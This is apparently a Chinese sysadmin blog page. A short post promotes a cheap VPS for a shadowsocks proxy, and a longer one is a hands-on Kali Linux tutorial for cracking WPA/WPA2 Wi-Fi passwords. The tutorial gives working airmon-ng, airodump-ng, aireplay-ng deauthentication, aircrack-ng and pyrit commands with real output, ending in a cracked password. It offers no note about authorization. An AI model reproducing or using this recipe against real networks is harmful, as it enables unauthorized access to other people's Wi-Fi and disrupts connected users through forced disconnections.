在路上 ……

Linux系统运维与架构

以前用的host大法总是不太稳定,也担心被各种黑。正好看到bwg有个9.9刀一年的vps,用来做个ss是最合适不过了。
废话不多说直接下单,洛杉矶机房的网络还是很不错的,从我家电信网络ping过去基本保持在180ms左右

PING 104.194.78.170 (104.194.78.170): 56 data bytes
64 bytes from 104.194.78.170: icmp_seq=0 ttl=52 time=185.181 ms
64 bytes from 104.194.78.170: icmp_seq=1 ttl=52 time=185.103 ms
64 bytes from 104.194.78.170: icmp_seq=2 ttl=52 time=187.705 ms
64 bytes from 104.194.78.170: icmp_seq=3 ttl=52 time=184.651 ms
64 bytes from 104.194.78.170: icmp_seq=4 ttl=52 time=184.948 ms
64 bytes from 104.194.78.170: icmp_seq=5 ttl=52 time=185.131 ms
^C
--- 104.194.78.170 ping statistics ---
6 packets transmitted, 6 packets received, 0.0% packet loss
round-trip min/avg/max/stddev = 184.651/185.453/187.705/1.022 ms

vps的配置只能说足够,基本配置如下:

  • 硬盘:5G SSD;
  • 内存:512M;
  • CPU:1x Intel Xeon;
  • 流量:每月 500G;
  • 带宽:1G;

搬瓦工支持 PayPal 付款,支持月付,但年付显然更优惠。好东西不敢独享,赶快去抢个吧,据说很快就会被抢光了,购买连接:Bandwagon


首先需要有一台运行kali linux的机器,无论是虚拟机或物理机,一块支持监听模式的无线网卡

root@kali:~# iwconfig 
wlan1     IEEE 802.11bg  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          
eth0      no wireless extensions.

lo        no wireless extensions.

查看无线网卡设备名

root@kali:~# airmon-ng start wlan1


Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID     Name
2772    dhclient
4415    wpa_supplicant


Interface       Chipset         Driver

wlan1           Realtek RTL8187L        rtl8187 - [phy0]
                                (monitor mode enabled on mon0)

进入监听模式

airodump-ng mon0 会列出搜索到的所有无线网络
从中找到你要测试破解的,copy下来BSSID

root@kali:~/test# airodump-ng -w nenew  -c 11 --bssid E4:D3:32:41:56:12   mon0

 CH 11 ][ Elapsed: 1 min ][ 2014-09-12 23:31 ][ WPA handshake: E4:D3:32:41:56:12                                         
                                                                                                                                                                                                   
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                                                                   
 E4:D3:32:41:56:12  -44  53      171        7    0  11  54e. WPA2 CCMP   PSK  TP-LINK_5612                                                                                                         
                                                                                                                                                                                                   
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                                         
                                                                                                                                                                                                   
 E4:D3:32:41:56:12  00:00:00:00:00:00    0    0 - 1      0    18135                                                                                                                                 
 E4:D3:32:41:56:12  64:B4:73:40:60:5C  -21    1e- 6e     0        7

当看到WPA handshake:说明抓到了握手包,就可以来破解了

如果一直抓不到,可以用如下命令来攻击,强迫重新握手

aireplay-ng -0 10 -a E4:D3:32:41:56:12  -c 64:B4:73:40:60:5C  mon0  --ignore-negative-one

抓到握手包后,就可以用字典来跑密码了。

root@kali:~/test# aircrack-ng -w ./password.txt  nenew-21.cap 
Opening nenew-21.cap
Read 18654 packets.

   #  BSSID              ESSID                     Encryption

   1  D0:C7:C0:6E:53:53  TP-LINK_5353              WPA (1 handshake)

Choosing first network as target.

Opening nenew-21.cap
Reading packets, please wait...

跑的速度如何取决于你机器的性能,更取决于你的字典
如果用物理机,有比较好的显卡,还可以用显卡来加速破解,效率比cpu高的多

kali linux下装显卡驱动,sdk等,参考如下链接
http://xiao106347.blog.163.com/blog/static/2159920782013113013549364
http://vistb.net/2011/08/how-to-crack-wifi-part-four/
http://blog.sina.com.cn/s/blog_56a70c040101exje.html

我这里用显卡,很快就跑出了密码

root@kali:~# pyrit -r nenew-21.cap  -i password.txt -b D0:C7:C0:6E:53:53 attack_passthrough
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'nenew-21.cap' (1/1)...
Parsed 14 packets (14 802.11-packets), got 1 AP(s)

Tried 4420221 PMKs so far; 86496 PMKs per second.

The password is 'qq123789'.

参考链接:http://lewiscomputerhowto.blogspot.com/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html


Typecho 强力驱动